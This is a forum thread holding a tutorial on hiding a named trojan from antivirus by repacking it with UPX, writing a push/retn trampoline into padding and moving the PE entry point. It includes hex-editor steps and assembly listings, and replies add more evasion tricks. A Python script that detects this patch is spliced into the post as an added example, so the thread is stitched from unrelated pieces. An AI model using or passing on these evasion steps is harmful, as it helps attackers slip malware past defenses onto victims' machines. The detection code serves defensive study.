ComSec
article submitted by Progressor

Universal method of tricking antivirus.

I won't explain every command, you'll have to learn Assembler for this.

Tools:
Hex editor - I used Hiew 6.75 (http://webhost.kemtel.ru/~sen)
Fearless PE Tool 0.1 - http://areyoufearless.com/modules.php?op=m...Downloads&file=index&req=getit&lid=125
UPX packer - http://upx.sourceforge.net/
Brain - must have it, you can't download it.

I took for example well known trojan wollf v1.6 (www.xfocus.org)

Now, let's start:

Wollf is already packed by an old version of UPX, so we unpack it and pack it again with the newest version of UPX.
Now we use the PE tool and find this info about our trojan:

Entry Point: 00024FD0h
Image Base: 00400000h

Let us open wollf.exe in Hiew, go to disassemble mode (F4/Decode), and go to the address Entry Point + Image Base = 00424FD0h; to do this press Goto (F5) and type ".00424FD0" (you need this dot before the address, because it is a virtual address). Now we see something like this:

CODE

.00424FD0: 60                           pushad
.00424FD1: BE00804100                   mov         esi,000418000  -----^ (1)
.00424FD6: 8DBE0090FEFF                 lea         edi,[esi][0FFFE9000]
.00424FDC: 57                           push        edi
.00424FDD: 83CDFF                       or          ebp,-001;"O"
.00424FE0: EB10                         jmps       .000424FF2  -----v (2)


Now we have to find a place for our patch: scroll down a couple of pages and you'll see a lot of space filled with zeros. I chose address 00425147. To edit, press F3/F2.
OEP = Entry Point + Image Base

CODE

.00425147: 68D04F4200                   push        000424FD0   <--- push OEP
.0042514C: 50                           push        eax
.0042514D: 9C                           pushfd                   <---for tricking AVP
.0042514E: 60                           pushad                    <---for tricking AVP
.0042514F: E800000000                   call       .000425154  <----- call for Ret 28h


Add another command, Ret 28h, and you will see:
.00425154: C22800 retn 00028 ;" ("

To save, press F9.

Then we add another 2 commands:
INC ECX
LOOP patch address

.00425161: 41 inc ecx <------- our new Entry Point
.00425162: E2E3 loop .000425147


Finally we have our patch:

CODE

.0042513F: 0000                         add         [eax],al
.00425141: 0000                         add         [eax],al
.00425143: 0000                         add         [eax],al
.00425145: 0000                         add         [eax],al
.00425147: 68D04F4200                   push        000424FD0  -----^ (1)
.0042514C: 50                           push        eax
.0042514D: 9C                           pushfd
.0042514E: 60                           pushad
.0042514F: E800000000                   call       .000425154  -----v (2)
.00425154: C22800                       retn        00028;" ("
.00425157: 0000                         add         [eax],al
.00425159: 0000                         add         [eax],al
.0042515B: 0000                         add         [eax],al
.0042515D: 0000                         add         [eax],al
.0042515F: 0000                         add         [eax],al
.00425161: 41                           inc         ecx           <------- our new Entry Point
.00425162: E2E3                         loop       .000425147  -----^ (3)  
.00425164: 0000                         add         [eax],al
.00425166: 0000                         add         [eax],al
.00425168: 0000                         add         [eax],al


And the last thing we should do: open the file in the PE tool and change the Entry Point:
Entry Point = Offset - Image Base = 00425161 - 00400000 = 0025161h

Now, if you can unpack the file with UPX, then I suppose you did it right. (Don't forget to back up your file or you'll have to make this patch again.)

I tested the patched file on McAfee VirusScan Pro 7.03; it doesn't detect our trojan.
Enjoy.
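As an added example, not part of the original post: a small Python check, written from the detection side, that parses a PE header, maps AddressOfEntryPoint to its section and file offset, and flags the two things the patch above leaves behind: an entry point that no longer starts with the UPX stub's pushad/mov esi, and an inc ecx/loop back into a push/retn trampoline. The minimal PE builder and the section layout are constructed sample data; the instruction bytes are the ones in the listings above.

```python
import struct

# Constructed sample bytes taken from the listings above: the UPX stub and the patch.
UPX_STUB = bytes.fromhex("60BE008041008DBE0090FEFF5783CDFFEB10")
PATCH = (bytes.fromhex("68D04F4200509C60E800000000C22800") + bytes(10)
         + bytes.fromhex("41E2E3"))                  # inc ecx; loop back to the push

def build_pe(section, sec_va, ep_rva, image_base=0x400000):  # constructed minimal PE32, one section
    dos = b"MZ" + bytes(58) + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    fhdr = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = (struct.pack("<H", 0x10B) + bytes(14) + struct.pack("<I", ep_rva)
           + bytes(8) + struct.pack("<I", image_base))      # magic, AddressOfEntryPoint, ImageBase
    sec = b"UPX1\0\0\0\0" + struct.pack("<IIIIIIHHI", len(section), sec_va,
                                        len(section), 0x200, 0, 0, 0, 0, 0x60000020)
    hdr = dos + fhdr + opt + bytes(224 - len(opt)) + sec
    return hdr + bytes(0x200 - len(hdr)) + section

def entry_point_report(data):  # map the entry point to section/file offset, flag what sits there
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    assert data[e_lfanew:e_lfanew + 4] == b"PE\0\0", "not a PE file"
    nsec, _, _, _, opt_size = struct.unpack_from("<HIIIH", data, e_lfanew + 6)
    opt = e_lfanew + 24
    ep_rva, _, _, image_base = struct.unpack_from("<IIII", data, opt + 16)   # ImageBase at +28
    for i in range(nsec):
        s = opt + opt_size + 40 * i
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, s + 8)
        if va <= ep_rva < va + max(vsize, rawsize):
            break
    else:
        return {"section": None, "ep_rva": ep_rva, "flags": ["entry point outside all sections"]}
    off = rawptr + (ep_rva - va)
    report = {"section": data[s:s + 8].rstrip(b"\0").decode(), "ep_rva": ep_rva, "file_offset": off, "flags": []}
    if data[off:off + 2] == b"\x60\xBE":       # pushad; mov esi,imm32: how the UPX stub starts
        report["flags"].append("upx unpacking stub at entry point")
    if data[off:off + 2] == b"\x41\xE2":       # inc ecx; loop rel8: the patched entry point
        tgt = off + 3 + struct.unpack_from("<b", data, off + 2)[0]
        # the loop target should read push imm32 ... retn/ret, i.e. a push/ret trampoline
        if data[tgt] == 0x68 and any(b in (0xC2, 0xC3) for b in data[tgt + 5:tgt + 20]):
            report["trampoline_target_rva"] = struct.unpack_from("<I", data, tgt + 1)[0] - image_base
            report["flags"].append("entry point loops into a push/ret trampoline")
    return report

# Lay both listings into one 0x1200-byte section at RVA 0x24000 so the RVAs match the post.
SECTION = bytearray(0x1200)
SECTION[0x0FD0:0x0FD0 + len(UPX_STUB)] = UPX_STUB   # RVA 0x24FD0: original entry point
SECTION[0x1147:0x1147 + len(PATCH)] = PATCH         # RVA 0x25147..0x25163: the patch
ORIGINAL = build_pe(bytes(SECTION), 0x24000, ep_rva=0x24FD0)
PATCHED = build_pe(bytes(SECTION), 0x24000, ep_rva=0x25161)    # 0x425161 - 0x400000
REPORTS = {"original": entry_point_report(ORIGINAL), "patched": entry_point_report(PATCHED)}
```

On the patched sample the report names the trampoline's target RVA, which is the original entry point 0x24FD0; a real scanner would compare that against the section's expected stub start rather than trusting the header.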
Faceless Master
Nice..
Need to test for KAV!
And one more thing: the link to the Fearless PE tool is broken.
It gave,
QUOTE
404 Error Message:
Page Not Found on http://areyoufearless.com
--------------------------------------------------------------------------------
We're sorry. The page you requested, http://areyoufearless.com, doesn't exist on " Fearless "

Regards
~Faceless Master
dmg
Thanks for sharing this knowledge. Very interesting reading. I don't know any assembly but am always eager to learn.

I encountered a problem while trying to reproduce the above:

call .000425154
loop .000425147

In both cases Hiew gives me an error "Invalid Operand". I CAN add the addresses without a dot but I guess that won't work.

Any idea what I'm doing wrong?

TIA
BillyJawz
Simple question: why don't you simply use a debugger like IDA or OllyDbg instead of a hex editor with an asm reading feature + a PE editor?

Nice tut, thanks.
BillyJawz
Response: those tools don't allow changing the PE entry point..

Sorry to ask

I usually trick antivirus software by packing (force method if already packed) with exe32pack (/F option if already packed)...lazy method.
matrixz
You can get Fearless PE Tool 0.1, Faceless Master, from this link:
http://areyoufearless.com/modules.php?op=m...download&sid=10
eXeco
If you use the free space between the code size and the virtual size to patch your server, don't forget to update the VA in the PE header.

If you are out of space you could add a new section and hook your EIP with a long jump (you need Sice to avoid complex VA/RVA calculation).

/EDIT:

If you only want to hook the EIP you could use the simple commands:

#newEIP : mov eax, oldEIP
#nextofft: jmp eax
niko
JMPs are too unpredictable, i.e., you always have to calculate offsets and crap.

The best universal way to jump anywhere you want is to do this:

PUSH <address> (make sure this is the virtual address)
RET

With this you can go anywhere without pain-in-the-butt calculations.

-niko
depaos
Thanks for this tip.
I ask a noob question because I'm not really understanding what this code does, but in some exes I tested it ran fine.

Only one thing: I tried to put it on a DLL. The patch tricks the AV for the DLL, but the DLL doesn't run correctly. Is that normal? Or is other code needed for a DLL file?
Thanks for your answer.
niko
The PUSH RET trick is kinda not too good for DLLs: the DLL image base changes depending on the system it's on. In other words, its code is relocated at run time to different addresses, hence this trick wouldn't work. It's mainly for EXEs; it will always work right in an EXE, but not for a DLL.

In DLLs you will still have to do some offset calcs no matter what.

-niko
Invision Power Board © 2001-2005 Invision Power Services, Inc.